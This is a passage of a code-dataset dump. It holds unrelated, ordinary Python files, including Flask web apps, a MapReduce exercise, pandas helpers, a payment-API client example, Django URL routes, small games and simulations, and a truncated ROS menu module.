Name or Credit Card number is wrong or no bookings could be found\\n', 'danger')\n\n return render_template('checkin_and_out/CheckIn.html', fm=form)\n\n\n@app.route('/checkin_and_out/checkoutform', methods=['GET', 'POST'])\ndef checkout():\n form = CheckOutForm()\n if form.validate_on_submit():\n credit_num = form.credit_num.data\n\n if CheckInManager.check_out(credit_num):\n return render_template('/checkin_and_out/AcceptCheckOut.html')\n else:\n flash('Your credit card number is incorrect or you have no records to checkout', 'danger')\n\n return render_template('checkin_and_out/CheckOut.html', fm=form)\n","sub_path":"code/app/controllers/frontend/checkin_and_out.py","file_name":"checkin_and_out.py","file_ext":"py","file_size_in_byte":2428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"178549858","text":"import MapReduce\nimport sys\n\n\"\"\"\nWord Count Example in the Simple Python MapReduce Framework\n\"\"\"\n\nmr = MapReduce.MapReduce()\n\n# =============================\n# Do not modify above this line\n\ndef mapper(record):\n # key: friend A\n # value: friend B\n key = record[0]\n value = record[1]\n pair_key = hash(key) * hash(value)\n mr.emit_intermediate(pair_key, record)\n\ndef reducer(key, list_of_values):\n # key: word\n # value: list of occurrence counts\n if len(list_of_values) < 2: \n fa = list_of_values[0][0] \n fb = list_of_values[0][1] \n mr.emit((fa,fb))\n mr.emit((fb,fa))\n\n\n# Do not modify below this line\n# =============================\nif __name__ == '__main__':\n inputdata = open(sys.argv[1])\n mr.execute(inputdata, mapper, reducer)\n","sub_path":"jsmapreduce/asymmetric_friendship.py","file_name":"asymmetric_friendship.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"559736793","text":"import pandas as pd\nimport numpy as np\n\ndatos = pd.read_csv(\"datosR.csv\")\n\ndatos2 = pd.read_csv(\"test_data_1.csv\")\n\ndef get_first_n_rows(dataset, n):\n \"\"\"Retorna un DataFrame que contiene las primeras filas de \"\"\"\n newData = dataset.head(n)\n return newData\n\ndef get_last_n_rows(dataset, n):\n \"\"\"Retorna un DataFrame que contiene las últimas filas de \"\"\"\n newData = dataset.tail(n)\n return newData\n\ndef remove_cols_with_nulls(dataset):\n \"\"\"Retorna con todas las columnas que tienen datos de tipo null removidas.\"\"\"\n colNUll = dataset.isnull().any()\n numCol = dataset.columns[colNUll]\n index = numCol.values\n newData = dataset.drop(index, axis=1)\n return newData\n\ndef filter_by_col(dataset, column_name, value):\n \"\"\"Filtra retornando un DataFrame que sólo contiene las filas donde el valor de la \n columna es igual a \"\"\"\n filterData = dataset[dataset[column_name] == value]\n return filterData\n\n#print(datos) \n\nprint(\"\\n\") \n\nprint(\"Resultado de get_first_n_rows: \\n\",get_first_n_rows(datos, 2))\nprint(\"*******************************************************************************\")\nprint(\"Resultado de get_last_n_rows: \\n\",get_last_n_rows(datos, 2))\nprint(\"*******************************************************************************\")\nprint(\"Resultado de remove_cols_with_nulls: \\n\",remove_cols_with_nulls(datos))\nprint(\"*******************************************************************************\")\nprint(\"Resultado de filter_by_col: \\n\",filter_by_col(datos, 'apellido', 'Rodriguez'))","sub_path":"pruebasRony.py","file_name":"pruebasRony.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"221523419","text":"from mcash import mapi_client\nfrom mcash.mapi_client.pusherconnector import PusherConnector\nimport sys\nimport time\nimport logging\nimport signal\nimport pprint\nimport uuid\nimport json\n\n\nclass MapiClientExample(object):\n\n _pos_id = \"winter_warming_stand_1\"\n\n def handleSigINT(self, signal, frame):\n logging.info(\"got SIGINT, shutting down\")\n # Give the callback client a chance to exit cleanly\n self.callback_client.stop()\n sys.exit(0)\n\n def shortlink_scanned(self, data):\n \"\"\"Called when a shortlink_scanned event is received\n \"\"\"\n # Inform log that we received an event\n self.logger.info(\"Received shortlink_scanned event\")\n\n data = json.loads(data)\n customer_token = str(data['object']['id'])\n response = self.mapiclient.create_payment_request(\n customer=customer_token,\n currency=\"NOK\",\n amount=\"20.00\",\n allow_credit=True,\n pos_id=self._pos_id,\n pos_tid=str(uuid.uuid4()),\n action='auth',\n expires_in=90,\n callback_uri=\"pusher:m-winterwarming-pos_callback_chan\",\n text='Have some hot chocolate!')\n self._tid = response['id']\n print(str(self._tid))\n\n def payment_authorized(self, data):\n self.logger.info(\"Received payment_authorized event\")\n pprint.pprint(data)\n\n if self._tid is not None:\n self.mapiclient.update_payment_request(\n tid=str(self._tid),\n action='capture')\n\n def pusher_connected(self, data):\n \"\"\"Called when the pusherclient is connected\n \"\"\"\n # Inform user that pusher is done connecting\n self.logger.info(\"Pusherclient connected\")\n\n # Bind the events we want to listen to\n self.callback_client.bind(\"payment_authorized\",\n self.payment_authorized)\n self.callback_client.bind(\"shortlink_scanned\",\n self.shortlink_scanned)\n\n def main(self):\n # set the log level to DEBUG, so we don't miss a thing\n self.logger = logging.getLogger('simpleexample')\n self.logger.setLevel(logging.DEBUG)\n\n # Handle interrupt signals cleanly\n signal.signal(signal.SIGINT, self.handleSigINT)\n\n # Set up a callback client, pusherclient in this case\n self.callback_client = PusherConnector(\n pusher_api_key='', # Your pusher API key\n callback_chan='m-winterwarming-pos_callback_chan', # chan to use\n logger=self.logger)\n\n # Listen to the pusherclient connected signal, so we can use it to\n # later connect our other listeners\n self.callback_client.pusher_connected_listeners.append(\n self.pusher_connected)\n\n # Set up the mAPI client\n self.mapiclient = mapi_client.MapiClient(\n auth=mapi_client.RsaSha256Auth('rsakey'), # RSA encryption is preferred\n mcash_merchant='exampleshop', # The merchant id we use\n mcash_user='admin', # The user to use for our merchant\n base_url='https://mcashtestbed.appspot.com/merchant/v1',\n additional_headers={\n 'X-Testbed-Token': # mcash testbed needs a token\n ''\n },\n logger=self.logger\n )\n\n # Create a shortlink\n self.mapiclient.create_shortlink(\n callback_uri=\"pusher:m-winterwarming-pos_callback_chan\")\n\n #uris, next_url, prev = self.mapiclient.get_shortlinks()\n pprint.pprint(self.mapiclient.get_all_shortlinks())\n\n # Sleep forever so we can keep listening to pusher signals\n while True:\n time.sleep(1)\n\n\nif __name__ == '__main__':\n # Instantiate and run our example\n mapiclientexample = MapiClientExample()\n mapiclientexample.main()\n","sub_path":"mcash/mapi_client/mapi_client_example.py","file_name":"mapi_client_example.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"31576815","text":"from django.conf.urls.defaults import *\n\n# Uncomment the next two lines to enable the admin:\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Example:\n # (r'^rynir/', include('rynir.foo.urls')),\n (r'^/?$', 'althingi.views.index'),\n (r'^fundur/(?P\\d+)/$', 'althingi.views.fundur'),\n (r'^scrape/(?Phttps?)(?::/)?/(?P[^/]+)/(?P.*)$',\n 'althingi.scraper.scrape'),\n (r'^scrape/bootstrap$', 'althingi.scraper.bootstrap'),\n\n # Uncomment the next line to enable the admin:\n (r'^admin/', include(admin.site.urls)),\n)\n","sub_path":"rynir/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"307912996","text":"#!/usr/bin/python3\n\"\"\"\npremium question\n\"\"\"\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n def __init__(self):\n self.exists = False\n self.root = None # need to handle 0\n self.total_sum = None\n\n def checkEqualTree(self, root: TreeNode) -> bool:\n \"\"\"\n two passes\n 1st pass, get total sum\n 2nd pass, check whether has sum/2\n space: O(log N)\n\n two save 2nd pass, store sums\n space: O(N)\n \"\"\"\n self.root = root\n self.total_sum = self.dfs(root)\n self.dfs(root)\n return self.exists\n\n def dfs(self, node):\n if not node:\n return 0\n\n l = self.dfs(node.left)\n r = self.dfs(node.right)\n s = l + r + node.val\n if node != self.root and self.total_sum != None and self.total_sum == s * 2:\n self.exists = True\n\n return s\n","sub_path":"663 Equal Tree Partition.py","file_name":"663 Equal Tree Partition.py","file_ext":"py","file_size_in_byte":1009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"375560897","text":"from flask import Flask, url_for, render_template, request, Markup\nimport os\nimport json\n\napp = Flask(__name__)\n\nwith open('health.json') as health_data:\n diseases = json.load(health_data)\n\n@app.route(\"/\")\ndef render_main():\n return render_template('home.html')\n@app.route(\"/p1\")\ndef render_page1():\n if \"disease\" not in request.args:\n \n return render_template('page1.html', disease = disease_lifetime())\n else:\n chosen_disease = request.args[\"disease\"]\n return render_template('page1.html', disease = disease_lifetime(), startlast = str(disease_start(chosen_disease)) +\"-\"+ str(disease_end(chosen_disease)))\n \n@app.route(\"/p2\")\ndef render_page2():\n return render_template('page2.html', Measles = measles_infectivity(),Polio = polio_infectivity(),Smallpox = smallpox_infectivity(), Pertuissis = pertuissis_infectivity())\n \n@app.route(\"/p3\")\ndef render_page3():\n return render_template('page3.html')\n\n\n\t\n \ndef disease_lifetime():\n listOfDiseases = []\n for x in diseases:\n if not x[\"disease\"] in listOfDiseases:\n listOfDiseases.append(x[\"disease\"])\n start = \"\"\n for x in listOfDiseases:\n start = start + Markup(\"\")\n return start \n \n\n \ndef disease_start(chosen_disease): \n first = 3000\n last = 0\n for x in diseases:\n if x[\"year\"] < first and chosen_disease == x[\"disease\"]:\n first = x[\"year\"]\n return first\n \ndef disease_end(chosen_disease): \n last = 0\n for x in diseases:\n if x[\"year\"] > last and chosen_disease == x[\"disease\"]:\n last = x[\"year\"]\n return last\n\ndef measles_infectivity():\n increase = \"\"\n average = 0\n all = {}\n \n for disease in diseases:\n if disease[\"disease\"]== \"MEASLES\":\n if disease[\"year\"] in all:\n all[disease[\"year\"]] += disease[\"increase\"]\n else:\n all[disease[\"year\"]] = disease[\"increase\"]\n for x in all:\n all[x] = all[x]/50\n \n increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n return increase\n \n \n\ndef polio_infectivity():\n increase = \"\"\n average = 0\n all = {}\n \n for disease in diseases:\n if disease[\"disease\"]== \"POLIO\":\n if disease[\"year\"] in all:\n all[disease[\"year\"]] += disease[\"increase\"]\n else:\n all[disease[\"year\"]] = disease[\"increase\"]\n for x in all:\n all[x] = all[x]/50\n \n increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n return increase\n \n \ndef smallpox_infectivity():\n increase = \"\"\n average = 0\n all = {}\n \n for disease in diseases:\n if disease[\"disease\"]== \"SMALLPOX\":\n if disease[\"year\"] in all:\n all[disease[\"year\"]] += disease[\"increase\"]\n else:\n all[disease[\"year\"]] = disease[\"increase\"]\n for x in all:\n all[x] = all[x]/50\n \n increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n return increase \n\ndef pertuissis_infectivity():\n increase = \"\"\n average = 0\n all = {}\n \n for disease in diseases:\n if disease[\"disease\"]== \"PERTUSSIS\":\n if disease[\"year\"] in all:\n all[disease[\"year\"]] += disease[\"increase\"]\n else:\n all[disease[\"year\"]] = disease[\"increase\"]\n for x in all:\n all[x] = all[x]/50\n \n increase = increase + Markup(\"{ x: new Date(\"+(str(x))+\", 00), y:\"+ str(all[x])+\" },\")\n return increase \n\n \n \n \nif __name__==\"__main__\":\n app.run(debug=True)\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":3769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"283996115","text":"#!/usr/bin/env python3\n# -*- config: utf-8 -*-\n\n# Вариант 3\n# Дан текст. Определить количество букв и в первом предложении. Рассмотреть два случая:\n# известно, что буквы и в этом предложении есть;\n# букв и в тексте может не быть.\nif __name__ == '__main__':\n p = input(\"Введите предложение: \")\n c = 0\n for i in p:\n if i == 'и':\n c += 1\n print(f\"{c}\")\n else:\n print(\"Букв И нет\")\n","sub_path":"iz_2.py","file_name":"iz_2.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"204544144","text":"import Adafruit_CharLCD\nimport RPi.GPIO as GPIO\nimport libPiInput.libPiInput as input\nimport interface\nfrom player_variables import *\n\nRotaryEncoder = input.RotaryEncoder.Worker(RE_A, RE_B)\nRotaryEncoderButton = input.Button.Worker(Button_RE)\nButton = input.Button.Worker(Button_Left)\nPowerButton = input.Button.Worker(Button_Power)\n\nRotaryEncoder.start()\nRotaryEncoderButton.start()\nButton.start()\nPowerButton.start()\n\nlcd = Adafruit_CharLCD.Adafruit_RGBCharLCD(lcd_rs, lcd_en, lcd_d4, lcd_d5, lcd_d6, lcd_d7,lcd_columns, lcd_rows, lcd_red, lcd_green, lcd_blue, enable_pwm=True)\nlcd.set_color(LCD_red, LCD_green, LCD_blue)\n\nminiplayer = interface.Interface(lcd, lms_server, lms_player)\n#miniplayer.start()\n\nminiplayer.ui.optimize_redraw = True\nminiplayer.ui.print_all()\n\n\nwhile True:\n if Button.get_response():\n miniplayer.user_input(1, True)\n if PowerButton.get_response():\n miniplayer.user_input(9, True)\n print(\"Power\")\n RE_delta = RotaryEncoder.get_delta()\n if RE_delta != 0:\n miniplayer.user_input(3, RE_delta)\n if RotaryEncoderButton.get_response():\n miniplayer.user_input(2, True)\n miniplayer.redraw()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"492386267","text":"class Solution(object):\r\n def isPalindrome(self, x):\r\n \"\"\"\r\n :type x: int\r\n :rtype: bool\r\n \"\"\"\r\n \r\n if x<0 or (x!=0 and x%10==0):\r\n return False\r\n \r\n # reverse algorithm\r\n sum = 0\r\n \r\n while x>sum:\r\n sum = sum*10 + x%10\r\n x = int(x/10)\r\n #print(x,sum)\r\n \r\n if sum == x or x == int(sum/10):\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n test = Solution()\r\n print(test.isPalindrome(515))\r\n","sub_path":"isPalindrome.py","file_name":"isPalindrome.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"137883588","text":"import cv2 \nimport os \n \ncam = cv2.VideoCapture(\"./1.mp4\") \ncam2 = cv2.VideoCapture(\"./2.mp4\") \n \ntry: \n \n if not os.path.exists('data'): \n os.makedirs('data') \n \nexcept OSError: \n print ('Error: Creating directory of data') \n \ncurrentframe = 0\nwhile(True): \n \n ret,frame = cam.read() \n ret2,frame2=cam2.read()\n if ret or ret2: \n if ret:\n name = './data/frame' + str(currentframe).zfill(3) + '.jpg'\n print ('Creating 1 ...' + name) \n \n cv2.imwrite(name, frame) \n currentframe += 1\n if ret2:\n name = './data/frame' + str(currentframe).zfill(3) + '.jpg'\n print ('Creating 2 ...' + name) \n \n cv2.imwrite(name, frame2) \n currentframe += 1\n\n else: \n break","sub_path":"extract_stereo_vido.py","file_name":"extract_stereo_vido.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"455952941","text":"import random\n\ndef drunk_walk(n):\n x = 0\n y = 0\n directions = [\"N\", \"S\", \"E\", \"W\"]\n for i in range(0,n):\n direction = random.choice(directions)\n if direction == \"N\":\n y += 1\n #print x, y\n elif direction == \"S\":\n y -= 1\n #print x, y\n elif direction == \"E\":\n x += 1\n #print x, y\n elif direction == \"W\":\n x -= 1\n #print x, y\n return x, y\n\n\ndef get_distance(end_points):\n #argument is a tuple of two integers\n a = end_points[0]\n b = end_points[1]\n c = ((a**2)+(b**2))**.5\n return c\n\n\ndef get_mean_distance(walks, steps):\n distances = []\n for i in range(walks):\n d = get_distance(drunk_walk(steps))\n distances.append(d)\n return sum(distances)/len(distances)\n","sub_path":"drunk_walk.py","file_name":"drunk_walk.py","file_ext":"py","file_size_in_byte":829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"270308317","text":"import subprocess\r\nimport time\r\n\r\nfor i in range(0,1):\r\n\t\r\n\ttime.sleep(0.5)\r\n\tsubprocess.Popen([\"python27.exe\",\"./Tibia_Bot_mouse(magia).py\"])\r\n\ttime.sleep(0.5)\r\n\tsubprocess.Popen([\"python27.exe\",\"./Tibia_Bot_teclado(andar).py\"])\r\n\r\n\t","sub_path":"2014/08_Tibia_Bot/Tibia_Bot.py","file_name":"Tibia_Bot.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"98007786","text":"#! python3\r\n#rock paper scissors\r\n\r\nimport random\r\n\r\nRPS=['rock','paper','scissors'] #list of choices\r\n\r\nI=0 #computer score\r\nYou=0 #player score\r\ngame=0 #keeps track of game number\r\nprint('I challenge you to rock paper scissors, best 2 out of 3!')\r\nwhile game<=2: #loops for 3 rounds\r\n print('rock paper scissors!')\r\n player=input()\r\n computer=random.choice(RPS)\r\n print(computer)\r\n if player==computer:\r\n print('its a tie!')\r\n game-=1 #makes sure there can be no tie at the end\r\n\r\n #sets the rules of rock paper scissors and tracks wins \r\n elif player=='rock':\r\n if computer=='paper':\r\n print('I win!')\r\n I+=1\r\n elif computer=='scissors':\r\n print('You win')\r\n You+=1\r\n elif player=='paper':\r\n if computer=='rock':\r\n print('you win')\r\n You+=1\r\n elif computer=='scissors':\r\n print('I win!')\r\n I+=1\r\n elif player=='scissors':\r\n if computer=='rock':\r\n print('I win!')\r\n I+=1\r\n elif computer=='paper':\r\n print('you win')\r\n You+=1\r\n \r\n game+=1\r\nprint('I won '+str(I)+' games, and you won '+str(You)+' games')\r\nif I>You:\r\n print('I beat you!')\r\nelse:\r\n print('You are clearly very good at this game')\r\n\r\n#im basically a wizard\r\n \r\n\r\n\r\n","sub_path":"rockPaperScissors.py","file_name":"rockPaperScissors.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"610325840","text":"import streamlit as st\nfrom utils import main\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n st.title('CDA Assignment \"Linear Regression\"')\n st.write('BTS')\n st.write('Roberto Arenal')\n #df=main().plot()\n\n st.subheader('Distribution of target variable:')\n plots = main()\n fig = plots.plot_hist()\n st.pyplot(fig)\n\n st.subheader('Correlation heatmap:')\n fig2 = plots.plot_heat()\n st.pyplot(fig2)\n\n st.subheader('Linear Regression:')\n option = st.radio('Select features:',['Time on Website', 'Time on App'], index=0)\n fig3, rmse_train, r2_train, rmse_test, r2_test = plots.linear_reg(option)\n st.pyplot(fig3)\n st.write('RMSE ', 'trining set: ',rmse_train, 'test set: ',rmse_test)\n st.write('R2 score ','training set: ', r2_train, 'test set: ',r2_test)\n\n st.subheader('Multivariate Linear Regression')\n options = st.multiselect('Select features:',['Avg. Session Length','Time on Website', 'Time on App','Length of Membership'],\n ['Time on App','Avg. Session Length','Length of Membership'])\n if st.button('Execute'):\n rmse_train, r2_train, rmse_test, r2_test, coef = plots.linear_reg_mult(options)\n coef=pd.DataFrame(coef, columns=options)\n st.write('Coefficients: ',coef.T)\n st.write('RMSE ', 'trining set: ',rmse_train, 'test set: ',rmse_test)\n st.write('R2 score ','training set: ', r2_train, 'test set: ',r2_test)\n\n st.sidebar.write('The target variable is normaly distributed. And there is not need to remove outliers.')\n st.sidebar.markdown('**The company should focuss on the App since the web page doesnt contribute positively to the Sales.**')\n st.sidebar.write('The Length of Membership is the feature that impacts Sales the most')\n st.sidebar.write('Coefficients Interpretation:')\n st.sidebar.write('- With all other variables held constant, if the length of membership increase by 1, Sales will increase by 61.68' )\n st.sidebar.write('- With all other variables held constant, if the time on app increase by 1, sales will increase by 38.27')\n st.sidebar.write('- With all other variables held constant, if the avg. session length increase by 1, sales will increase by 25.66')\n st.sidebar.write('Before investing in the app, the company should invest on developing a strategy to mantain their actual members and increase their loyalty. This because what impact sales the most is the Length of membership, meaning that loyal customers are the ones who buy more. Later on, the company can invest on the app. Doing something to increase the amount of time that the user spents. For example, providing a section of recommended items based on searches that he/she has made.')\n","sub_path":"ClassicalDataAnalysis/Assignments/LinReg/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"179918085","text":"import glob\nfrom datasets.Loader import register_dataset\nfrom datasets.KITTI.segtrack.KITTI_segtrack_feed import KittiSegtrackLikeFeedDataset\n\nNAME = \"MOTS_segtrack_feed\"\nDEFAULT_PATH = \"/globalwork/voigtlaender/data/MOTS_challenge/train/\"\n\nSEQ_IDS_TRAIN = []\nSEQ_IDS_VAL = [\"%04d\" % idx for idx in [2, 5, 9, 11]]\n\n\n@register_dataset(NAME)\nclass MOTSSegtrackFeedDataset(KittiSegtrackLikeFeedDataset):\n def __init__(self, config, subset):\n super().__init__(\n config,\n subset,\n \"MOTS_segtrack\",\n DEFAULT_PATH,\n SEQ_IDS_TRAIN,\n SEQ_IDS_VAL,\n False,\n )\n self.time_starts_at_1 = True\n\n def get_filenames_for_video_idx(self, idx):\n print(\"GET FILES FOR VIDEO\")\n print(self.data_dir + \"/images/\" + self._video_tags[idx] + \"/*.jpg\")\n print(\n sorted(\n glob.glob(self.data_dir + \"/images/\" + self._video_tags[idx] + \"/*.jpg\")\n )\n )\n return sorted(\n glob.glob(self.data_dir + \"/images/\" + self._video_tags[idx] + \"/*.jpg\")\n )\n","sub_path":"TrackR-CNN/datasets/MOT/segtrack/MOTS_segtrack_feed.py","file_name":"MOTS_segtrack_feed.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"461778576","text":"#!/usr/bin/python\nimport pygtk\npygtk.require(\"2.0\")\nimport gtk\nimport gdl\n\nwin = gtk.Window(gtk.WINDOW_TOPLEVEL)\n\ndock = gdl.Dock()\nlayout = gdl.DockLayout(dock)\n\nitem1 = gdl.DockItem(\"item1\", \"Item #1\", gtk.STOCK_EXECUTE,gdl.DOCK_ITEM_BEH_NORMAL)\nbutton = gtk.Button (\"test\")\nitem1.add(button)\ndock.add_item (item1, gdl.DOCK_RIGHT)\n\nitem1.dock_to(None, gdl.DOCK_FLOATING, -1)\n\nitem1.show_all()\n\nitem2 = gdl.DockItem(\"item2\", \"Item #2\", gtk.STOCK_EXECUTE, gdl.DOCK_ITEM_BEH_NORMAL | gdl.DOCK_ITEM_BEH_CANT_ICONIFY | gdl.DOCK_ITEM_BEH_CANT_CLOSE)\nbutton = gtk.Button (\"test2\")\nitem2.add(button)\ndock.add_item (item2, gdl.DOCK_RIGHT)\n\nitem2.dock_to(None, gdl.DOCK_FLOATING, -1)\n\nitem2.show_all()\n\n\nwin.add(dock)\n\n\nwin.show_all()\ngtk.main()\n","sub_path":"examples/gdl_test.py","file_name":"gdl_test.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"642854577","text":"# -*- coding: utf-8 -*-\r\nimport pickle\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.externals import joblib\r\n\r\n\r\nif __name__ == '__main__':\r\n \r\n lightgmb_weight = 0.7\r\n xgboost_weight = 0.3\r\n\r\n model1 = pd.read_pickle(\"data/prediction_lightgbm.pkl\")\r\n model2 = pd.read_pickle(\"data/prediction_xgboost.pkl\")\r\n \r\n result = pd.merge(model1, model2, on = ['order_id', 'product_id'], suffixes=('_x', '_y'))\r\n \r\n result['prediction'] = result['prediction_x']*lightgmb_weight + result['prediction_y']*xgboost_weight\r\n result.drop(['prediction_x', 'prediction_y'], axis = 1, inplace = True)\r\n \r\n result['prediction'] = result['prediction'].astype(np.float32)\r\n result['order_id'] = result['order_id'].astype(np.int32)\r\n result['product_id'] = result['product_id'].astype(np.int32)\r\n \r\n result.to_pickle('data/prediction_two_model.pkl')","sub_path":"models/averaging.py","file_name":"averaging.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"249197893","text":"import warnings\nimport numpy as np\nimport pandas as pd\nfrom collections.abc import Iterable\n\n\ndef is_iterable_not_str(obj):\n \"\"\"Check if an object is an iterable but not a string.\"\"\"\n if isinstance(obj, str):\n return False\n if isinstance(obj, Iterable):\n return True\n return False\n\n\ndef make_unique_index(df_index, offset_duplicates=0.001, warn=True):\n \"\"\"Given a non-unique DatetimeIndex, create a unique index by adding\n milliseconds to duplicate entries\n\n Parameters\n ----------\n df_index : DatetimeIndex\n non-unique temporal index\n offset_in_seconds : float, optional\n add this many seconds to consecutive duplicate entries, by default 0.01\n warn : bool, optional\n issue user warning?, by default True\n\n Returns\n -------\n DatetimeIndex\n Unique index\n \"\"\"\n assert isinstance(df_index, pd.DatetimeIndex)\n if df_index.is_unique:\n return df_index\n if warn:\n warnings.warn(\n \"Time axis has duplicate entries. Now adding milliseconds to non-unique entries to make index unique.\"\n )\n values = df_index.duplicated(keep=False).astype(float) # keep='first'\n values[values == 0] = np.NaN\n\n missings = np.isnan(values)\n cumsum = np.cumsum(~missings)\n diff = np.diff(np.concatenate(([0.0], cumsum[missings])))\n values[missings] = -diff\n\n # np.median(np.diff(df.index.values))/100\n offset_in_ns = offset_duplicates * 1e9\n tmp = np.cumsum(values.astype(int)).astype(\"timedelta64[ns]\")\n new_index = df_index + offset_in_ns * tmp\n return new_index\n","sub_path":"fmskill/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"361690422","text":"# Copyright (c) 2020 Carnegie Mellon University\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\nThis is a menu implementation for cabot handle\n\nAuthor: Daisuke Sato \n\"\"\"\nimport json\nimport subprocess\nimport os\n\nimport rospy\nimport std_msgs.msg\nimport mongodb_store.srv\nimport dynamic_reconfigure.client\n\nimport cabot.util\nfrom cabot_ui import i18n\n\nclass Action(object):\n \"\"\"Menu Action abstract class\"\"\"\n def __init__(self, config, menu):\n self._menu = menu\n self._config = config\n\n def do_action(self):\n \"\"\"need to implement do_action in concreate class\"\"\"\n return False\n\nclass Actions(Action):\n \"\"\"Lisf of Actions\"\"\"\n @staticmethod\n def create_actions(config, menu):\n \"\"\"create menu action classes\"\"\"\n actions = Menu.get_menu_config(config, \"actions\")\n\n return Actions(actions, menu)\n\n def __init__(self, config, menu):\n super(Actions, self).__init__(config, menu)\n temp = []\n if config:\n for action in config:\n _type = Menu.get_menu_config(action, \"type\", error=True)\n \n if _type == \"publish_topic\":\n temp.append(PublishTopicAction(action, menu))\n elif _type == \"reconfigure\":\n temp.append(ReconfigureAction(action, menu))\n elif _type == \"syscommand\":\n temp.append(SyscommandAction(action, menu))\n else:\n raise RuntimeError(\"%s action is not defined\" % (_type))\n\n temp.append(MenuSelectAction(None, menu))\n\n self.actions = temp\n\n def do_action(self):\n result = True\n for action in self.actions:\n result = result and action.do_action()\n return result\n\n def __str__(self):\n return str(self.actions)\n\ndef my_import(name):\n components = name.split('.')\n mod = __import__(components[0])\n for comp in components[1:]:\n mod = getattr(mod, comp)\n return mod\n\nclass PublishTopicAction(Action):\n \"\"\"Menu Action for publishing topic\"\"\"\n def __init__(self, config, menu):\n super(PublishTopicAction, self).__init__(config, menu)\n self._topic = Menu.get_menu_config(config, \"topic\", error=True)\n self._msg_type = Menu.get_menu_config(config, \"msg_type\", default=\"std_msgs.msg.String\")\n \n if self._topic is not None:\n ### needs to update with custom message typep\n self._pub = rospy.Publisher(self._topic, my_import(self._msg_type), queue_size=1)\n\n def do_action(self):\n curr = self._menu.value\n if curr is not None:\n if isinstance(curr, Menu):\n curr = curr.value\n if curr is not None:\n self._pub.publish(curr)\n return True\n return False\n\n\nclass ReconfigureAction(Action):\n \"\"\"Menu Action for reconfiguration\"\"\"\n def __init__(self, config, menu):\n super(ReconfigureAction, self).__init__(config, menu)\n self._targets = Menu.get_menu_config(config, \"targets\", error=True)\n self._error_count = 0\n\n _clients = {}\n\n def do_action(self):\n for target in self._targets:\n target_name = target[\"name\"]\n if target_name not in ReconfigureAction._clients:\n try:\n 